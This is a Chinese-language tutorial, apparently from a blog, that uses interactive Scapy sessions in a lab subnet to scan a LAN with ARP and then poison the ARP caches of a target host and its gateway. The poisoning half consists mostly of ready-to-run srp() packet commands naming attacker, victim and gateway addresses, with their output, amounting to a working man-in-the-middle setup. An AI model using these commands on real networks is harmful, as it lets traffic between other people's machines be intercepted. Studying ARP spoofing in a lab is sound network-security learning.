1、局域网Arp扫描:
1) 简单实现:(复杂实现定义为方法别人可以自动实现获取自己IP地址所在段或者直接定义循环IP地址)

>>arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24'))
Begin emission:
***Finished to send 256 packets.
................................................^C(复杂实现定义什么时候停止)
Received 51 packets, got 3 answers, remaining 253 packets
>> print(arp2[0].show())
0000 Ether / ARP who has 192.168.80.1 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:c0:00:08 says 192.168.80.1 / Padding
0001 Ether / ARP who has 192.168.80.2 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:ef:49:1f says 192.168.80.2 / Padding
0002 Ether / ARP who has 192.168.80.251 says 192.168.80.250 ==> Ether / ARP is at 00:0c:29:21:fd:03 says 192.168.80.251 / Padding
2) 拆开看数据包192.168.80.251的字段:
>> print(arp2[0].res[2][1].fields)(复杂实现查看字段自动提取)
{'src': '00:0c:29:21:fd:03', 'dst': '00:0c:29:e2:bb:15', 'type': 2054}
>> print(arp2[0].res[2][1].show())(复杂实现查看字段自动提取)
###[ Ethernet ]###
dst= 00:0c:29:e2:bb:15
src= 00:0c:29:21:fd:03
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:21:fd:03
psrc= 192.168.80.251
hwdst= 00:0c:29:e2:bb:15
pdst= 192.168.80.250
###[ Padding ]###
load= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

None
2、ARP spoof(arp毒化)
1)毒化192.168.80.251主机(告诉它网关mac是***者的mac地址):
192.168.80.1 mac地址为00:50:56:c0:00:08(网关)
192.168.80.250 mac地址为00:0c:29:e2:bb:15(***者)
192.168.80.251 mac地址为00:0c:29:21:fd:03(被***者)

>>arp3=(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
>> arp3.show()
###[ Ethernet ]###
dst= 00:0c:29:21:fd:03
src= '00:0c:29:e2:bb:15'
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.1
hwdst= 00:0c:29:21:fd:03
pdst= 192.168.80.251
>>arp3=srp(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
Begin emission:
Finished to send 1 packets.
....^C
Received 4 packets, got 0 answers, remaining 1 packets
由于arp为二层包只要目的mac正确就可以发送,192.168.80.251接收到arp回复报文只读取 ARP报文中的hwsrc=''00:0c:29:e2:bb:15'与psrc='192.168.80.1'放入自己arp缓存中。
截图:
毒化前192.168.80.251 arp 缓存:
Scapy交互式arp扫描与***
毒化后192.168.80.251 arp 缓存:

Scapy交互式arp扫描与***
3) 毒化网关(告诉网关192.168.80.1主机192.168.80.251 mac地址为***者mac):

>>arp4=(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
>> arp4.show()
###[ Ethernet ]###
dst= 00:50:56:c0:00:08
src= 00:0c:29:e2:bb:15
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.251
hwdst= 00:50:56:c0:00:08
pdst= 192.168.80.1

>>arp4=srp(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
Begin emission:
Finished to send 1 packets.
........^C
Received 8 packets, got 0 answers, remaining 1 packets
由于arp为二层包只要目的mac正确就可以发送,192.168.80.1接收到arp回复报文只读取 ARP报文中的hwsrc=''00:0c:29:e2:bb:15'与psrc='192.168.80.251'放入自己arp缓存中。
截图:
毒化前192.168.80.1 arp 缓存:

Scapy交互式arp扫描与***
毒化后192.168.80.1 arp 缓存:

Scapy交互式arp扫描与***